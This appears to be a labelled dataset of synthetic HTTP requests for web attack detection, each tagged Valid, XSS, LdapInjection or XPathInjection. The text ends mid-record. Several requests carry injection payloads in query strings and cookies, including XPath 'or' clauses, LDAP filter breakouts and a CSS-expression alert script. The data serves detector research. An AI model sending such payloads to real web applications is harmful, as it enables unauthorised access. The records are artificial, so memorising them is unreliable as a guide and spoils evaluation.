Warning: 881 201.232.1.60 "LvritattEe" "Tue, 06 Jan 04 03:25:52 UTC"
X-Forwarded-For: 218.173.209.61
X-Serial-Number: 189729230
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1977
Start - Id: 36969
class: LdapInjection
GET /ern5vteiigtNyhekeDi.php?nee=%26eth&1eAaEhEesO7mL=chr9wsArh7&e5=%29++%28++%7C+%282nt%3Dsis*%29&nI=139&covctrE1eee=fesoay2e4Omm&u56elak=nlink%25to HTTP/1.1
Host: 177.227.38.33
Connection: aiRdshl
Accept: audio/*;q=0.0, video/mpeg
Accept-Charset: iso-8859-5, windows-1250;q=0.1, x-mac-chinesetrad
Accept-Encoding: compress, identity, identity;q=0.7, compress, compress
Accept-Language: ytr-b9ena, l-eozni, e-1;q=0.6
Cache-Control: only-if-cached
Client-ip: 248.80.57.117
Cookie: ae7=wkxdDF6;deLrel5n5=oev>e e0t;orc2trag=nxM0Vnrn5;0xtelnet-@bJusr=uN;1a4i774=078535
Cookie2: $Version="3"
Date: Sat, 31 Dec 05 09:52:19 CET
ETag: W/"kRj_Ud1No8MgV-PGN5a"
Expect: 100-continue
From: ooeh@nqieoausen.gov
If-Modified-Since: Sat, 27 May 06 05:43:22 UTC
If-Unmodified-Since: Thu, 26 Jan 06 16:43:18 UTC
If-Match: "XQdXfvq.3bE@IFjdV"
If-None-Match: "b81RCllo4JeISay"
If-Range: Sat, 06 Aug 05 17:22:10 CET
Max-Forwards: 527
MIME-Version: 0.9
Pragma: lno13wco='ceet'
Proxy-Authorization: Digest opaque="cttu"
Authorization: Basic azlqdTpudGlo
Range: 84-,-422477,1197-5319
Referer: /I9riau/traaixia.gif
TE: deflate;q=0.0
Trailer: Max-Forwards
User-Agent: hk26W4-G62 http://www.qgOl.biz
UA-CPU: StrongARM
UA-Disp: 553,0581,32
UA-Pixels: 8538x2200
Transfer-Encoding: gzip
Upgrade: eslm/4.5, njAt/8.0
Warning: 330 236.251.100.102 "4xln" "Thu, 31 Mar 05 03:35:22 UTC"
X-Serial-Number: 36508239
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36969
Start - Id: 20681
class: Valid
GET /yqUvT@Ubdsj/eZo5FJNu5sZ/ssen9EnM-X3p-B01d0o/eNE/hje/VrJZG.xUeval/oYh@pAvuq7wjJ.gif?omcrtaeoeyaSs7=D7ueryb+5&DDgU=yt9qoL&ioeibs=526350029&o1dr=n6e4&nr0uDeb=c&tBonSm=e1S&ainp=tshtnz9vlcopyEc5nperleL&r6e=aE%40&TgBleeenO=oOjt&1ewsnOymqs=select&a4h3rd=MfIiaetetkSktaEkz HTTP/1.0
Host: 91.84.231.127
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: dwcyOysd-bstcrrt1;q=0.9
Cache-Control: no-cache
Client-ip: 84.226.49.215
Cookie: bn=fselectelsS;rta0a=8019;og4u4s=1836219;4basenieawmis=04nmvar1lN;tqvuhs7ei7=yGB4YCv
Cookie2: $Version="170"
Date: Mon, 12 May 08 01:08:54 CET
ETag: W/"s7SI4EA2N1EJR5lVH"
Expect: 100-continue
From: ecmlju@Nneh.be
If-Modified-Since: Thu, 30 Jul 09 19:26:54 CET
If-Unmodified-Since: Tue, 12 Feb 08 18:48:28 UTC
If-Match: "zyDbF647Arof7H3Lg@N"
If-None-Match: "A.Y_k-y7qaLMewYq"
If-Range: Sun, 13 Jun 04 17:26:32 CET
Max-Forwards: 3
MIME-Version: 9.0
Pragma: rrrehsr=Eg
Proxy-Authorization: Basic SXM3RDptc2cybWljbw==
Authorization: aIbD sshlNiP=eaepn
Range: 28-,-887274
Referer: /fLeixm.aspx
TE: gzip,chunked
Trailer: Accept-Charset
User-Agent: t7HXrl http://www.tn5drp.cz
UA-CPU: PowerPC
UA-Disp: 8694,520,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 413x553
Via: FTP/7.9 125.197.93.1:38992
Transfer-Encoding: compress
Upgrade: uetty/9.5, 9so2/7.4, stjts/1.7, yh7t/7.0
Warning: 262 www.ua2g.png "oOpth" 
X-Forwarded-For: 255.159.77.194
X-Serial-Number: 7399609
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20681
Start - Id: 48714
class: XPathInjection
GET /IjeaUkefaZhgsdu/kesrttiagittiie9riv/.95fMU4oO/3L/aTrnfoti03dktee/Rt/ob_s/tee2itihhitbsr1oie.gif?tttdtr=062&hfgeSearh=reotslLselectlogoi&ueoy6EuqBroa5t=1&iBa8w=eHixd1-7O&q8agtifohef=495134&a3Carrirn=sosE4ex&as=5695029&bo=oufd-horSnalocationltelnetvi+midn&tmmt6sllpgsew=a7re&ien5stpi=oBOpNvWMV&oB4scripth3=8ytbn%2F&xf6kNy6ouLe=236874&LIycmdshutdownEtelnetiQB=tie%2F8%2Fp%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D150%5D+++++or+++%27eet%27+%3D+++%27 HTTP/1.0
Host: www.cergakeP.de
Connection: ksOo
Accept: */*
Accept-Charset: *;q=0.1
Accept-Language: rani-yoj0do;q=0.7
Client-ip: 14.52.89.216
Cookie: fiLrts4nr=Ohseianhlcv;Aedhritocpho=4;cewsmoeoh=n3a
Cookie2: $Version="7"
Expect: ekEMd3
If-Unmodified-Since: Mon, 20 Oct 08 12:55:00 GMT
If-Range: *
Max-Forwards: 592
Referer: /aHHlppa/Oql8aYr/terjq.mdb
User-Agent: Mozilla/2.6 (Windows; U; WinNT 5.7; tn-iI; rv:2.9.0) Gecko/01027332
Upgrade: jsys/9.9, esPjt/6.5, ns2dn/0.3, 7cR6zm/2.4
~~~~~: ~~~~~~~~~~

null

End - Id: 48714
Start - Id: 47400
class: XSS
GET /g8qz/Utx8arltwRfanw6nb/n4Kkz3oYGnncJrBARpu7/fTJkSYQK5wA3iUMo6H/zebGOD/echof9z-qCI_Y/le2deceqn.nsf?NnD=%7Cz1leg1%26rinsertn&enc7nNd=-%40wreplace&ttlemhso6=ri+s+dt&C5q9U0Lyl.qU=%5Bovn&buneHIuiete8oss=lz8&lqahitetiedsd=5919&fUnrnobonl7u=%3Cdiv++style+++%3D%22++++width%3A++++expression%28%5Balert++++%28%27elhp%27%29%3B%5D%29%3B++%22%3E HTTP/1.1
Host: 189.95.92.148
Connection: lnwoh6
Accept: text/*;q=0.2, application/*;q=0.2, image/jpeg
Accept-Charset: *
Accept-Encoding: 
Accept-Language: SlzaaDg-plfed
Cache-Control: no-store
Client-ip: 162.119.135.49
Cookie: hsiaepnd=e94l;oiai9l8cun5Niee=gLmjg5qWo0;isbaRoegee=qcwi6I9aeT
Cookie2: $Version="57"
Date: Fri, 15 Feb 08 13:42:26 UTC
ETag: "xslHmXI@16wFajcv"
Expect: 100-continue
From: Tfteutit@rtorijsiis.be
If-Modified-Since: Fri, 27 Mar 09 24:17:48 UTC
If-Unmodified-Since: Tue, 31 Mar 09 05:53:42 UTC
If-Match: *
If-None-Match: "Jcoz8eEx4bFjMYp"
If-Range: Sun, 01 Nov 09 02:51:13 GMT
Max-Forwards: 3557
MIME-Version: 0.3
Pragma: lkfs=c2d
Proxy-Authorization: cHest eInm=wotttdoe
Authorization: Basic ZWVpbzpDSGt6N3R0aw==
Range: 3529-807061,329-36,-0646
Referer: http://www.fc5E.de/euurRoez/naaa/sjgrehn/stuIftyr/3uiretci.jsp
TE: trailers,deflate;q=0.2
Trailer: Range
User-Agent: Mozilla/5.5 (Machintosh; U; Mac OS X 8.0; ck-ye; rv:1.5.5) Gecko/95212773
UA-CPU: StrongARM
UA-Disp: 0322,0692,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 1670x058
Via: HTTP/4.9 83.108.112.70, TiEa/1.4 www.s0efd.jpeg:4799, HTTP/5.1 44.102.156.190
Transfer-Encoding: idune
Upgrade: uns/4.6, rb2/9.4, tsywas/1.7, Onrj/5.3, anii/8.9
Warning: 805 www.etFooy.png "eaacsEipcsy" "Tue, 21 Sep 04 14:03:42 CET"
X-Forwarded-For: 39.101.79.171
X-Serial-Number: 6529673477463
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 47400
Start - Id: 34620
class: Valid
POST /ahrtotwcfl0st/.9wW/9dacleneopptx8afl/A1locationoWbgsound@NKmpassthruoTKy/mFi6jjUFaIN/bfNye8ewfO/Kog3stdin/n99ilerdbrdads/OBhxtfk6elog.js? HTTP/1.1
Content-Length: 168
Content-Language: DOfpeins,sroiepty,fatln
Content-Encoding: compress
Content-Location: /rCr5/9n5o1Ijo/eeyBs.pl
Content-MD5: MEVpc0FyenI1cmVyaWt0YQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 12 Dec 05 20:10:34 CET
Last-Modified: Thu, 14 May 09 20:45:39 UTC
Host: 95.137.240.181:80
Connection: keep-alive
Accept: application/*, image/*;q=0.2
Accept-Charset: euc-tw;q=0.9, euc-kr;q=0.5, windows-1255;q=0.0, x-mac-ce;q=0.6, x-mac-ce;q=0.7
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: max-stale=1
Client-ip: 234.206.164.47
Cookie: sibre6lcfbvu=vu2;2t1GQ2Qb=9137;rsncdOS=xaOEi;sa6sTpehrhio0=r7jR;orTumas=hGr1GVuJX.J9;QeobsdrBewsosj=ic C8
Cookie2: $Version="89"
Date: Tue, 22 Jul 08 12:39:08 CET
ETag: "pmwLoVSIYD_1jtnevNn"
Expect: 100-continue
From: o2iTn@deiqcrI.net
If-Modified-Since: Sat, 10 Feb 07 01:17:15 CET
If-Unmodified-Since: Mon, 22 May 06 10:47:49 GMT
If-Match: *
If-None-Match: *
If-Range: "XShgOX7ZnfgU1aPKjW"
Max-Forwards: 168
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: Basic aEFpYWhvZTozR3RlZW4=
Range: -64
Referer: /ezaubelu/s9iaea/feeors.php3
TE: trailers,trailers,trailers
Trailer: Range
User-Agent: UiIesENsengvnrr
UA-CPU: PowerPC
UA-Disp: 743,4010,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 3397x406
Via: 0.4 108.156.119.76:2, 2.3 www.astweaev.tiff:93365, 5.7 96.227.72.114
Transfer-Encoding: compress
Upgrade: rIu/4.2, Etk/6.8
Warning: 638 32.100.231.190 "ronreot0rsachetajte" 
X-Forwarded-For: 207.213.57.172
X-Serial-Number: 1977553705
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

gNsfdyn=a' s0dnsztoigia&jiIreatuaaslrE=67340630&vedansr=dptEe&tm14lif2dule=nrmbyS&lcujninsertoxterm9E=randswI8hnH&st=63&qIdmrehc=Isefemictudc&sogb=t swth3t&wphieNu=84

End - Id: 34620
Start - Id: 37406
class: LdapInjection
GET /utiostatatldulohw/euecm0naltZ/iR/pkvaQeI/qfseBJmoK-Zx/ehrynAeooa4.png?LoyPuGxusrbinD=eao&Fadminhn0a=oat&gcec=klah&1aIXuL=%40xa%26hejhi%292scripthmi&adrBstSrelez=ellz4&pbwns2n=a_6We220SPPY HTTP/1.1
Host: www.erochal5ti.de:3
Connection: close
Accept: image/*;q=0.4
Accept-Charset: *
Accept-Encoding: identity;q=0.4, deflate;q=0.0, gzip
Accept-Language: *
Cache-Control: min-fresh=006
Client-ip: 249.124.138.253
Cookie: Rxmlaboot.initelnetGe=fNGfOT9dJEL;biotemiulseeorw=8585100;Et=\l5;lcBbogcrorshR=epcmoe3ga e;aebfayenf9men=)   (    |   ( cn=*o'brien* )(mail   =*o   'brien* )   
Cookie2: $Version="29"
Date: Fri, 16 Apr 10 11:40:05 CET
ETag: "XD5I.lskin7RRYarIK1"
Expect: 100-continue
From: 3ear@vimqehoae.fr
If-Modified-Since: Sun, 19 Sep 04 18:02:42 GMT
If-Unmodified-Since: Tue, 30 May 06 21:44:20 UTC
If-Match: *
If-None-Match: *
If-Range: "t@JnA44ImqBMwPXjndj"
Max-Forwards: 72
MIME-Version: 8.7
Pragma: Rinibg=ntcotY
Proxy-Authorization: Digest algorithm=MD5
Authorization: HtkENn Rrcs8si=e8tIt
Range: 082112-540,03898-739302,66-304
Referer: http://eljeOo.com/muEicyo/laeInrdo/islr/su6ed.tiff
TE: chunked
Trailer: Accept-Charset
User-Agent: nJ7Tv8JedP http://www.Wthe.org
UA-Disp: 143,2118,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 233x3973
Via: 9.4 209.106.199.235
Transfer-Encoding: identity
Upgrade: 0qT0/3.3, atdAri/8.2, twem/5.1, heg/3.0, t8toX/0.5
Warning: 110 www.1sSr.png "tiesroIlaaR0sr3" "Wed, 20 May 09 14:04:30 UTC"
X-Forwarded-For: 165.215.42.96
X-Serial-Number: 0741742884020240
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37406
Start - Id: 49102
class: XPathInjection
GET /ekXqvjRw5n8guJgQn.Ir/3e4saNlid9.pl?tYpotmomihbe=rvciDiMh&t1=6G8y0&in8H6eutSu=5167700&syihAleabn=%3Dnnl&oc3srgomO8n5si=iasasIn%27++++or+path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+or+++++%270sseewse%27++%3D+%27&AedEs=9909889 HTTP/1.1
Host: 235.225.128.165
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: iso-8859-8;q=0.1, windows-874;q=0.2, x-mac-korean;q=0.9, windows-1252;q=0.7
Accept-Encoding: *;q=0.0
Accept-Language: ur92whor-RuziPdl, hr23p8nb-yn6t, ehice-wi;q=0.0, darn-Ak;q=0.8, tmsr-dAotik8n;q=0.1
Cache-Control: no-transform
Client-ip: 139.222.82.202
Cookie: kdhWtUZ=gengcnnkiht;sd=537461666;tbwesdanaduviN=0368;ytaoe9=5;0C2t_7id=2u1B;o2ncNwindow.openE=422
Cookie2: $Version="212"
Date: Wed, 10 Nov 04 10:22:59 UTC
ETag: "i9p280DZTSCOq9@T"
Expect: 100-continue
From: o1Nf5@ocset.it
If-Modified-Since: Mon, 14 Feb 05 08:13:39 GMT
If-Unmodified-Since: Sun, 05 Jun 05 14:00:58 UTC
If-Match: "xOdDzZBstjtmPsNj"
If-None-Match: "uyfznM1XcRBNtR-"
If-Range: "81zY1HGZax12lfNso"
Max-Forwards: 766
MIME-Version: 4.7
Pragma: clui2pz=7Ew
Proxy-Authorization: Basic ZmhkZTp0dWV1dA==
Authorization: et64ot flE5y=1aat
Range: 80-
Referer: http://www.t1drpn.org/chr6rd/mje7eUu/oenM/3a4he03/4erd.htm
TE: gzip,trailers,trailers
Trailer: Referer
User-Agent: lDttnnsue (u2DQFwWaN)
UA-CPU: StrongARM
UA-Disp: 3801,296,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 7313x7197
Via: ekfeO/3.1 www.nfi2.shtml
Transfer-Encoding: deflate
Upgrade: aau/4.8
Warning: 839 245.108.185.165 "nonbs" 
X-Forwarded-For: 46.39.13.172
X-Serial-Number: 7433292
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49102
Start - Id: 13111
class: Valid
GET /tehnCA/LsefOhtscimeahhu1e/ai4obtgs/btct.mdb?68.M8P=djG&dQiacoalepwsn=lrllIiawwindow.open HTTP/1.1
Host: 234.184.156.190
Connection: keep-alive
Accept: video/mpeg
Accept-Charset: windows-1254, x-mac-chinesetrad, koi8-r;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 205.66.41.114
Cookie: aei3mre3=nT8maktrO4thnat2hi;nfuedt=eEssrFh95S;eehhio=eye m
Cookie2: $Version="38"
Date: Mon, 28 Dec 09 03:13:10 UTC
ETag: W/"SRb2aCAxGYdujK7JISq"
Expect: 100-continue
From: uth2onre@imezhnI.biz
If-Modified-Since: Fri, 30 Apr 04 09:25:48 GMT
If-Unmodified-Since: Mon, 02 Feb 04 11:54:26 UTC
If-Match: "KlX2Phwve5269h@XQ..N"
If-None-Match: *
If-Range: *
Max-Forwards: 6827
MIME-Version: 1.1
Pragma: lekea='5shpor'
Proxy-Authorization: NTLM dWdyb2xkYWZuaW5oaGNzdGNueHlpMnRUbGI2ZWJlanRlMW80YW9iaXJvYWN0ZGVl
Authorization: Basic dWVuYW86YWFhc3pkZQ==
Range: -7936
Referer: http://www.nLsnsotm.com/eledaoed/oeaw.nsf
TE: trailers,trailers
Trailer: Cache-Control
User-Agent: htgd/1.5.7.1
UA-CPU: Sparc
UA-Disp: 436,469,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 824x5832
Via: soet/3.6 130.238.96.214, eNdaH/9.1 31.158.216.232
Transfer-Encoding: gzip
Upgrade: tyecs/6.5, entdn0/7.6, rpaim/9.0, esi/3.9
Warning: 376 211.106.118.186 "rssg" 
X-Forwarded-For: 129.45.112.20
X-Serial-Number: 74451528959
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13111
Start - Id: 22326
class: Valid
GET /cbjohBac5_5aY/J@DusrL3y2bypasswdGn/1afidR4nie/amsL6nanleit.bin?ns5it0tqrfe=i HTTP/1.0
Host: 192.2.234.112:45
Connection: keep-alive
Accept: application/postscript;q=0.1, application/postscript;q=0.0, text/html
Accept-Charset: *
Accept-Encoding: compress;q=0.7, identity, compress
Accept-Language: *;q=0.7
Cache-Control: max-stale=8
Client-ip: 205.205.233.59
Cookie: 0deoeHhett3te=yUZ@rRGLbx;Ooeeuwdtubsv=ewx eadaeao &6e;et6tEnfs=idh;ieni=zPoihrtebeaco;tcp=m
Cookie2: $Version="57"
Date: Mon, 25 Jun 07 13:21:05 UTC
ETag: W/"EUjpsUHaRQVOa0OVIUF"
Expect: 100-continue
From: iHpsna2i@sBsaOrTep.ch
If-Modified-Since: Tue, 04 Oct 05 19:41:54 GMT
If-Unmodified-Since: Fri, 10 Apr 09 05:27:59 UTC
If-Match: "Vjq0YrbsDx.zgYDR"
If-None-Match: *
If-Range: *
Max-Forwards: 112
MIME-Version: 9.3
Pragma: vxcr=h
Proxy-Authorization: NTLM ZW1vdG9mb3BhanRydHB5b3Nkc2xldHJhaGVhdG5lYWRvY3NzaUVlQXJudGNiZmNm
Authorization: NTLM ZWlpZXJudHl4b2ZjdG5pdHMxb3VneGRkaU50eW4wZWRidW9zY3VjOHJhZWVj
Range: -086874,-834
Referer: /isa8xn/2aureT/enso0uie/mushdrA.mdb
TE: deflate;q=0.8,chunked;q=0.3,trailers
Trailer: Trailer
User-Agent: rrs7jen/3.9.9.0
UA-CPU: StrongARM
UA-Disp: 6322,2576,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 254x8392
Via: 0.6 2.45.18.151, 6siiha/7.1 www.tedodt.jpg
Transfer-Encoding: deflate
Upgrade: eOhtM/9.6, icm/5.3, zas/4.8
Warning: 671 28.174.76.18 "cWdlqucSkne3oqeaa" "Tue, 12 Oct 04 20:29:33 CET"
X-Forwarded-For: 205.232.245.228
X-Serial-Number: 8809830
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22326
Start - Id: 4584
class: Valid
POST /wp-583DyW/r2WePDbEMBGJI/9.db/aqFxYkSE8dot1POsH3.png? HTTP/1.0
Content-Length: 72
Content-Language: hwsrrn
Content-Encoding: compress
Content-Location: /lvEa9cve/cinqh/ere2co/aiosasnk/rt6nglar.jsp
Content-MD5: cjhyaTNoaGFsRW9zZGFscg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 01 Dec 04 05:54:01 UTC
Last-Modified: Sun, 03 Sep 06 14:15:55 UTC
Host: www.Clensela.de:50
Connection: Me2or
Accept: image/gif;q=0.5, audio/basic;q=0.9
Accept-Charset: euc-tw;q=0.2, koi8-r;q=0.5, euc-kr;q=0.0, cp-932;q=0.8, windows-1255;q=0.7
Accept-Encoding: *;q=0.0
Accept-Language: znselnn-yulede, YN-g2ajnMf;q=0.2, itaTdofm-bdes, iteala-tlaseJ;q=0.3
Cache-Control: only-if-cached
Client-ip: 159.41.146.40
Cookie: sVya1el=i]eg1kt ngautoexecyad;tn=6841778;7oe2vo=Eosloinat;KEGwindow.openiG=te8iboot.ini;iael5oNild=viftnvsT;cogtans=script
Cookie2: $Version="006"
Date: Fri, 09 Feb 07 11:12:11 UTC
ETag: W/".KYKaS._Rs4Pa6eMf"
Expect: Ioowfsh=eukgain6
From: a5wn@h3Rit.be
If-Modified-Since: Sat, 09 Oct 04 24:53:39 GMT
If-Unmodified-Since: Thu, 24 Apr 08 02:42:01 UTC
If-Match: *
If-None-Match: "k1Flc4yLGMgJmo4Y0y"
If-Range: Thu, 03 Sep 09 08:48:11 GMT
Max-Forwards: 64
MIME-Version: 6.2
Pragma: dt5nbwt='omat0k'
Proxy-Authorization: qkktsv 2oai=91eto
Authorization: Basic c2ZRdGRyOmhlbHd1TDJs
Range: -6763
Referer: http://www.jeu3st.com/ttaaa/dnetii0.mpeg
TE: trailers,deflate;q=0.5,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/7.1 (compatible; MSIE 2.4; Win98; pbE4; ceaDEo0ll; rIds)
UA-CPU: StrongARM
UA-Disp: 067,349,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 1436x3813
Via: 5.5 www.secztCr.gif, 8.5 236.198.68.109
Transfer-Encoding: compress
Upgrade: ixu/5.5
Warning: 520 www.1weN3tt.js "tnnre9haoghuxhIda3e" "Fri, 07 May 04 09:34:48 CET"
X-Forwarded-For: 210.240.131.9
X-Serial-Number: 9967522166
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

0Iem=ee6tiail3hGP&.yxggT1k8_=iumaxtermlxp_eygoiiy&on=9&0CtU=hM-@MIqmct

End - Id: 4584
Start - Id: 3084
class: Valid
GET /lvaswnilun2alAdreId/m-7G9HS21TrzlDc7u6/tiheetlrnrer/a@h.processing-instructionXByPxall/tNwL9EbOc@tu2unXpU5/ohLh6Auk42-o.php3?2wsaeedcel=%2FL-l&Ah0zAn2eaeyeph=tohsh&lNwRZyHnodeRg=hecjteosnbetweenRayfsi%2B&4i4=t1tvwlhbhea7on&ziqitesiamVN=fbtzl44Q&etnh=passwd25&1N=ls&tmp-winntfftpoh1I=ih5GTvpDbd HTTP/1.1
Host: 9.170.237.113
Connection: close
Accept: */*;q=0.1
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: 2hye-nsdhrej, tOcii-odc5a;q=0.9
Cache-Control: no-store
Client-ip: 31.89.199.112
Cookie: bteuAHtnteeetU8=i0A;dIew82imnvcsf=sNW;ddegrs19eitn=window.openftpc;ramiooeis8ni=330393;htlolsRtdrmi=676
Cookie2: $Version="512"
Date: Thu, 09 Aug 07 23:55:14 CET
ETag: "_E.V5qXt3SjugXA6FW-e"
Expect: 100-continue
From: ssmefI@deee3y.biz
If-Modified-Since: Tue, 18 Sep 07 06:39:50 GMT
If-Unmodified-Since: Mon, 19 Apr 10 10:59:57 UTC
If-Match: "ztsve@0nW1vnsYgpawG"
If-None-Match: "1LUq9jBZiIfK@Ag"
If-Range: Mon, 23 Apr 07 04:45:26 UTC
Max-Forwards: 77
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: Digest username="endc"
Authorization: a6ron oaxoU=edH5e
Range: 23-20512,7-,-616668
Referer: /etomaupp.mdb
TE: gzip,trailers,trailers
Trailer: Accept
User-Agent: jrtc/0.8.4.3.4
UA-CPU: StrongARM
UA-Disp: 3610,5724,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 3082x5034
Via: caao/7.8 www.dnw2Dm.html
Transfer-Encoding: identity
Upgrade: ket/3.8, j3t/3.2
Warning: 361 101.25.41.103 "npcnnernr1ihee0t" "Sun, 02 Aug 09 11:35:21 GMT"
X-Forwarded-For: 54.60.0.87
X-Serial-Number: 1257275939567339049
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3084
Start - Id: 15197
class: Valid
GET /e5le8HdxoE/odo8OUKD.@.3vQY/eauuhAstRt3anaRrdan/oaM0.locationcN/yheseU/yfht1s/Mlr5LKkG4Jsy.perlL.png?daa=8&w28nsagw=490593182&TgoDJhN=ras&prort=joeldrficiyabarit&zv6bcRr=or3q&Xun2AdtEuaoabt=o2a&EFnOsam=89&Osa=ethtaifti&leh8oeib=ea&dyeN1a89ddrHhhg=positionoboot.inij&vidgoD4FX1=%2FgaLiframeTeaurNa7ue&smailftp@URRg=lpp2Pup3&cvbyrORzs=13198&n9bnTstei=oeeoreyh&F@.lUQn8uqn=u HTTP/1.0
Host: www.sSatlmt.uk
Connection: close
Accept: text/*;q=0.2, video/mpeg;q=0.8
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: atEse-h;q=0.8, r-p;q=0.3, 42h-Ba;q=0.0, nn-ab, dt-l;q=0.9
Cache-Control: max-stale=3
Client-ip: 49.90.43.231
Cookie: 3zZNncdUt=a 88=;eipfti=94131942;w5pwl==h$;0s=hetwt;reuisEilsrS=pisdhboot.inipea=n]lIeR;dct97gTomaupee=c@Ai
Cookie2: $Version="700"
Date: Thu, 15 Apr 10 10:38:05 GMT
ETag: W/"xCeoa3pmieGCTn6"
Expect: 100-continue
From: ltpredhx@Enoq.be
If-Modified-Since: Fri, 15 Apr 05 06:50:09 UTC
If-Unmodified-Since: Sat, 02 Jan 10 07:34:26 CET
If-Match: "1jWzowMPzzJWXYef"
If-None-Match: *
If-Range: Mon, 17 Aug 09 16:22:06 CET
Max-Forwards: 0
MIME-Version: 3.1
Pragma: isiteh=Md
Proxy-Authorization: Digest realm
Authorization: 2oKd dti7nal=t6ihpnaA
Range: 478892-,53727-
Referer: /Iitdpt/uaooid.asp
TE: gzip,trailers
Trailer: Upgrade
User-Agent: DSeyDe8bn (rxZhCs_; ieM-udX7; eDxA32; 5q44Gz9; ryELpVsyB@)
UA-CPU: x86
UA-Disp: 450,4767,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 1443x630
Via: veu/1.2 www.AteDyiL.shtml, 0.2 205.46.47.165
Transfer-Encoding: ueXs; soereh=woSao
Upgrade: ul7E/4.8, 6ds/5.5, SCn/3.1, eut/7.8
Warning: 672 146.81.253.52 "jtadl" "Mon, 09 Feb 04 19:26:43 CET"
X-Forwarded-For: 236.127.123.213
X-Serial-Number: 01906983974999
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15197
Start - Id: 36857
class: LdapInjection
GET /eiSG/2ntoaDentT3o/h6qZhK7jOzMfNThZ2bA/JW-fromLDnu9/MsamfeWqXKAdhxml0Lz/mHeeEl/Zxk@NcWN/nwre7hAIl/4u_83w_/cnoyo5nA/e43/Rdiogelvlahooob5.dll?ns=uXSn9-C%40fmQZ&h2at9wEsenh=0575638 HTTP/1.1
Host: www.ukn6.fr:8
Connection: cintota
Accept: */*;q=0.0
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: rsRt)(    |(hdi1=*)
Cache-Control: no-transform
Client-ip: 146.228.96.174
Cookie: aHha=b ;deall nqsoZhta
Cookie2: $Version="83"
Date: Fri, 03 Mar 06 12:50:19 GMT
ETag: "93Pa0A.Gi0zdrPvWdQy1"
Expect: 100-continue
From: lvelladt@3trbvtitH.net
If-Modified-Since: Sun, 26 Apr 09 02:21:03 GMT
If-Unmodified-Since: Wed, 06 Oct 04 09:41:47 GMT
If-Match: "0qd.6vG5P.LpPtrpf-nr"
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 0.5
Pragma: no-cache
Authorization: Digest uri=http://eiecdnRr.ch/Iftd/y8awyiFe.png
Range: 62221-7,-0
Referer: http://www.ahlo.gov/u6Steott/nsip/peTl/sot8r.tiff
TE: chunked
User-Agent: Mozilla/4.5 (Windows; U; Win 9x 8.0; eo-er; rv:1.5.0) Gecko/53392802
UA-CPU: MIPS
UA-Disp: 564,7539,32
UA-Color: color32
UA-Pixels: 6170x381
Via: tOpf/9.9 251.164.75.124, 0.5 www.nHnyt.jpg
Transfer-Encoding: 3em9h0
Warning: 684 204.159.228.94 "osfhtonymxe6" "Mon, 02 Oct 06 19:23:23 UTC"
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36857
Start - Id: 5232
class: Valid
PUT /lQxQU6XW6DAynuZ/vnph-C/1aN_zzXwi/rtG6wisrdsfsu8arfa/3HS9z.php3? HTTP/1.1
Content-Length: 117
Content-Language: 5sa,FeoiDg,Eb7si5i
Content-Encoding: gzip
Content-Location: http://4veuuSr.gov/yv8u/kwdt24di/ysnN/htupi5.php4
Content-MD5: b25ucG5pd2gwSjl0cmRuOQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 27 Jan 05 14:58:32 CET
Last-Modified: Wed, 14 Jun 06 08:15:33 CET
Host: 21.26.38.157
Connection: keep-alive
Accept: text/html, audio/*, application/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: max-stale=950
Client-ip: 92.14.113.211
Cookie: kJj4809etc0=693564;hwmon=ti6ioSL;.likeuRVDgO=)hsN]hd Ph$Kt;r0tbenlksa=366619;owvigzerxndrf=fvngllelkwrynfuqos;a9aREeEtESimty=)tr5dvnae
Cookie2: $Version="1"
